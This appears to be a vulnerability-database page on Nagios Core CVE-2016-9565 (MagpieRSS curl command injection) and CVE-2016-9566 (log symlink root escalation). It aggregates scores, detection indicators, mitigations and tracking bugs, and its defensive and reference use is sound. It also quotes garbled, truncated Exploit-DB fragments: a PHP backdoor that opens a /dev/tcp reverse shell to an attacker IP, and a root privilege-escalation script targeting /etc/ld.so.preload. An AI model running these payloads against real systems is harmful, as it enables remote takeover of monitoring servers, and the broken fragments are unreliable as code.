CVE-2016-9565
published 2016-12-15CVE-2016-9565: MagpieRSS, as used in the front-end component in Nagios Core before 4.2.2 might allow remote attackers to read or write to arbitrary files by spoofing a…
PriorityP271critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
22.68%
97.4th percentile
MagpieRSS, as used in the front-end component in Nagios Core before 4.2.2 might allow remote attackers to read or write to arbitrary files by spoofing a crafted response from the Nagios RSS feed server. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-4796.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nagios | nagios | <= 4.2.1 | — |
| nagios | nagios | <= 4.2.3 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor for creation of or writes to /etc/ld.so.preload by the nagios user/group, which indicates symlink-based privilege escalation chained with CVE-2016-9565. ↗
- →Detect HTTP responses to Nagios RSS feed requests (rss-corefeed.php) that contain a Server header with PHP webshell code, as the exploit injects a backdoor via a spoofed RSS feed server response. ↗
- →Alert on creation of PHP files (e.g. nagios-backdoor.php) in the Nagios web root directory, which is the persistence mechanism dropped by the exploit. ↗
- →Detect outbound connections from the Nagios web server process (e.g. apache/www-data) to attacker-controlled IPs over arbitrary ports, indicative of a reverse shell spawned via the PHP backdoor. ↗
- →Monitor requests to /nagios/rss-corefeed.php that result in outbound HTTPS/HTTP connections to unexpected external hosts, as the exploit requires DNS spoofing to redirect this feed fetch to an attacker server. ↗
- →Detect injection of a shared library path into the Nagios external command pipe (nagios.cmd), used to bypass write restrictions on /etc/ld.so.preload. ↗
- ·The vulnerability exists because of an incomplete fix for CVE-2008-4796; patching to Nagios Core 4.2.2 or later is required to fully remediate. ↗
- ·Disabling the RSS feed components (rss-corefeed.php, rss-newsfeed.php, and the rss includes directory) eliminates the attack surface at the cost of losing the Nagios news widget functionality. ↗
- ·CVE-2016-9565 can be leveraged by remote attackers to gain nagios group access, which can then be chained with CVE-2016-9566 (symlink attack on log file) to escalate to root. ↗
- ·The /etc/ld.so.preload symlink attack stage (CVE-2016-9566) requires the attacker to already be running as the 'nagios' user or a member of the 'nagios' group, as obtained via CVE-2016-9565. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv10.0CRITICAL
vendor_redhat10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-828p-3vwg-wc22: MagpieRSS, as used in the front-end component in Nagios Core before 4
ghsa_unreviewed·2022-05-14·CVSS 10.0
CVE-2016-9565 [CRITICAL] CWE-284 GHSA-828p-3vwg-wc22: MagpieRSS, as used in the front-end component in Nagios Core before 4
MagpieRSS, as used in the front-end component in Nagios Core before 4.2.2 might allow remote attackers to read or write to arbitrary files by spoofing a crafted response from the Nagios RSS feed server. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-4796.
GHSA
GHSA-9332-j4wp-2xcq: base/logging
ghsa_unreviewed·2022-05-14·CVSS 9.8
CVE-2016-9566 [CRITICAL] CWE-59 GHSA-9332-j4wp-2xcq: base/logging
base/logging.c in Nagios Core before 4.2.4 allows local users with access to an account in the nagios group to gain root privileges via a symlink attack on the log file. NOTE: this can be leveraged by remote attackers using CVE-2016-9565.
OSV
CVE-2016-9566: base/logging
osv·2016-12-15·CVSS 9.8
CVE-2016-9566 [CRITICAL] CVE-2016-9566: base/logging
base/logging.c in Nagios Core before 4.2.4 allows local users with access to an account in the nagios group to gain root privileges via a symlink attack on the log file. NOTE: this can be leveraged by remote attackers using CVE-2016-9565.
OSV
CVE-2016-9565: MagpieRSS, as used in the front-end component in Nagios Core before 4
osv·2016-12-15·CVSS 10.0
CVE-2016-9565 [CRITICAL] CVE-2016-9565: MagpieRSS, as used in the front-end component in Nagios Core before 4
MagpieRSS, as used in the front-end component in Nagios Core before 4.2.2 might allow remote attackers to read or write to arbitrary files by spoofing a crafted response from the Nagios RSS feed server. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-4796.
Red Hat
nagios: Command injection via curl in MagpieRSS
vendor_redhat·2016-12-13·CVSS 10.0
CVE-2016-9565 [CRITICAL] CWE-77 nagios: Command injection via curl in MagpieRSS
nagios: Command injection via curl in MagpieRSS
MagpieRSS, as used in the front-end component in Nagios Core before 4.2.2 might allow remote attackers to read or write to arbitrary files by spoofing a crafted response from the Nagios RSS feed server. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-4796.
It was found that an attacker who could control the content of an RSS feed could execute code remotely using the Nagios web interface. This flaw could be used to gain access to the remote system and in some scenarios control over the system.
Mitigation: #!/bin/bash
mv /usr/share/nagios/html/includes/rss /usr/share/nagios/html/includes/rss.disarmed
mv /usr/share/nagios/html/rss-corefeed.php /usr/share/nagios/html/rss-corefeed.php.disarmed
mv /usr/share/nagios/htm
Red Hat
nagios: Privilege escalation issue
vendor_redhat·2016-12-07·CVSS 9.8
CVE-2016-9566 [CRITICAL] CWE-59 nagios: Privilege escalation issue
nagios: Privilege escalation issue
base/logging.c in Nagios Core before 4.2.4 allows local users with access to an account in the nagios group to gain root privileges via a symlink attack on the log file. NOTE: this can be leveraged by remote attackers using CVE-2016-9565.
A privilege escalation flaw was found in the way Nagios handled log files. An attacker able to control the Nagios logging configuration (the 'nagios' user/group) could use this flaw to elevate their privileges to root.
Package: nagios (Red Hat Mobile Application Platform 4) - Affected
Package: nagios (Red Hat OpenStack Platform 10 (Newton)) - Not affected
Package: nagios (Red Hat OpenStack Platform 8 (Liberty)) - Not affected
Package: nagios (Red Hat OpenStack Platform 9 (Mitaka)) - Not affected
No detection rules found.
Exploit-DB
Nagios < 4.2.2 - Arbitrary Code Execution
exploitdb·2016-12-15·CVSS 9.8
CVE-2016-9565 [CRITICAL] Nagios < 4.2.2 - Arbitrary Code Execution
Nagios /dev/tcp/192.168.57.3/8080 0&1 &'"); ?> is not blacklisted
#
# which will do the trick as it won't mess up the payload :)
self.add_header('Server', backdoor)
# Return XML/feed with JavaScript payload that will run the backdoor code from nagios-backdoor.php via tag :)
print "[*] Feed XML with JS payload returned to the client in the response. This should load nagios-backdoor.php in no time :) \n"
self.write(xmldata)
self.finish()
tornado.ioloop.IOLoop.instance().stop()
if __name__ == "__main__":
global backdoor_path
global backdoor
print intro
# Set attacker's external IP & port to be used by the reverse shell
if len(sys.argv) /dev/tcp/%s/%s 0&1 &'"); die("stop processing"); ?>""" % (attacker_ip, attacker_port)
# Feed XML containing JavaScript payload that will load the nagios
Exploit-DB
Nagios < 4.2.4 - Local Privilege Escalation
exploitdb·2016-12-15·CVSS 9.8
CVE-2016-9566 [CRITICAL] Nagios < 4.2.4 - Local Privilege Escalation
Nagios /etc/ld.so.preload
fi
echo -e "\n[+] Job done. Exiting with code $1 \n"
exit $1
}
function ctrl_c() {
echo -e "\n[+] Ctrl+C pressed"
cleanexit 0
}
#intro
echo -e "\033[94m \nNagios Core - Root Privilege Escalation PoC Exploit (CVE-2016-9566) \nnagios-root-privesc.sh (ver. 1.0)\n"
echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m"
# Priv check
echo -e "\n[+] Starting the exploit as: \n\033[94m`id`\033[0m"
id | grep -q nagios
if [ $? -ne 0 ]; then
echo -e "\n[!] You need to execute the exploit as 'nagios' user or 'nagios' group ! Exiting.\n"
exit 3
fi
# Set target paths
ERRORLOG="$1"
if [ ! -f "$ERRORLOG" ]; then
echo -e "\n[!] Provided Nagios log path ($ERRORLOG) doesn't exist. Try again. E.g: \n"
echo -e "./nagios-root-privesc.sh /usr/local
Bugzilla
CVE-2016-9565 nagios: Command injection via curl in MagpieRSS [fedora-all]
bugzilla·2016-12-16·CVSS 9.8
CVE-2016-9565 [CRITICAL] CVE-2016-9565 nagios: Command injection via curl in MagpieRSS [fedora-all]
CVE-2016-9565 nagios: Command injection via curl in MagpieRSS [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported versions of Fed
Bugzilla
CVE-2016-9565 nagios: Command injection via curl in MagpieRSS
bugzilla·2016-12-16·CVSS 10.0
CVE-2016-9565 [CRITICAL] CVE-2016-9565 nagios: Command injection via curl in MagpieRSS
CVE-2016-9565 nagios: Command injection via curl in MagpieRSS
MagpieRSS, a component for handling RSS news feeds in Nagios Core control panel / front-end, was found vulnerable to command injection due to insufficient neutralization of special elements in function _httpsrequest().
The vulnerability could potentially enable remote unauthenticated attackers who managed to impersonate the feed server (via DNS poisoning, domain hijacking, ARP spoofing etc.), to provide a malicious response that injects parameters to curl command used by the affected RSS client class and effectively read/write arbitrary files on the vulnerable Nagios server. This could lead to Remote Code Execution in the context of www-data/nagios user on default Nagios installs that follow the official setup guidelines.
Thi
Bugzilla
CVE-2016-9565 nagios: Command injection via curl in MagpieRSS [epel-all]
bugzilla·2016-12-16·CVSS 9.8
CVE-2016-9565 [CRITICAL] CVE-2016-9565 nagios: Command injection via curl in MagpieRSS [epel-all]
CVE-2016-9565 nagios: Command injection via curl in MagpieRSS [epel-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported versions of
arXiv
Extended Abstract: Mimicry Resilient Program Behavior Modeling with LSTM based Branch Models
arxiv_fulltext·2018-03-24
Extended Abstract: Mimicry Resilient Program Behavior Modeling with LSTM based Branch Models
Extended Abstract: Mimicry Resilient Program Behavior Modeling \ LSTM based Branch Models
Hayoon Yi11,
Gyuwan Kim1,21,
Jangho Lee1,
Sunwoo Ahn1,
Younghan Lee1,
Sungroh Yoon12,
Yunheung Paek12
1Dept. of Electrical and Computer Engineering, Seoul National University
2Search Solutions, Inc
Email: hyyi,kgwmath,ubuntu,swahn,yhlee,sryoon,[email protected]
1: Equal Contribution,
2: Corresponding Author
## Abstract
In the software design, protecting a computer system from a plethora of software attacks or malware in the wild has been increasingly important. One branch of research to detect the existence of attacks or malware, there has been much work focused on modeling the runtime behavior of a program. Stemming from the seminal work of Forrest et al., one of the main tools to model program
http://packetstormsecurity.com/files/140169/Nagios-Core-Curl-Command-Injection-Code-Execution.htmlhttp://rhn.redhat.com/errata/RHSA-2017-0211.htmlhttp://rhn.redhat.com/errata/RHSA-2017-0212.htmlhttp://rhn.redhat.com/errata/RHSA-2017-0213.htmlhttp://rhn.redhat.com/errata/RHSA-2017-0214.htmlhttp://rhn.redhat.com/errata/RHSA-2017-0258.htmlhttp://rhn.redhat.com/errata/RHSA-2017-0259.htmlhttp://seclists.org/fulldisclosure/2016/Dec/57http://www.securityfocus.com/archive/1/539925/100/0/threadedhttp://www.securityfocus.com/bid/94922http://www.securitytracker.com/id/1037488https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.htmlhttps://security.gentoo.org/glsa/201702-26https://security.gentoo.org/glsa/201710-20https://www.exploit-db.com/exploits/40920/https://www.nagios.org/projects/nagios-core/history/4x/http://packetstormsecurity.com/files/140169/Nagios-Core-Curl-Command-Injection-Code-Execution.htmlhttp://rhn.redhat.com/errata/RHSA-2017-0211.htmlhttp://rhn.redhat.com/errata/RHSA-2017-0212.htmlhttp://rhn.redhat.com/errata/RHSA-2017-0213.htmlhttp://rhn.redhat.com/errata/RHSA-2017-0214.htmlhttp://rhn.redhat.com/errata/RHSA-2017-0258.htmlhttp://rhn.redhat.com/errata/RHSA-2017-0259.htmlhttp://seclists.org/fulldisclosure/2016/Dec/57http://www.securityfocus.com/archive/1/539925/100/0/threadedhttp://www.securityfocus.com/bid/94922http://www.securitytracker.com/id/1037488https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.htmlhttps://security.gentoo.org/glsa/201702-26https://security.gentoo.org/glsa/201710-20https://www.exploit-db.com/exploits/40920/https://www.nagios.org/projects/nagios-core/history/4x/
2016-12-15
Published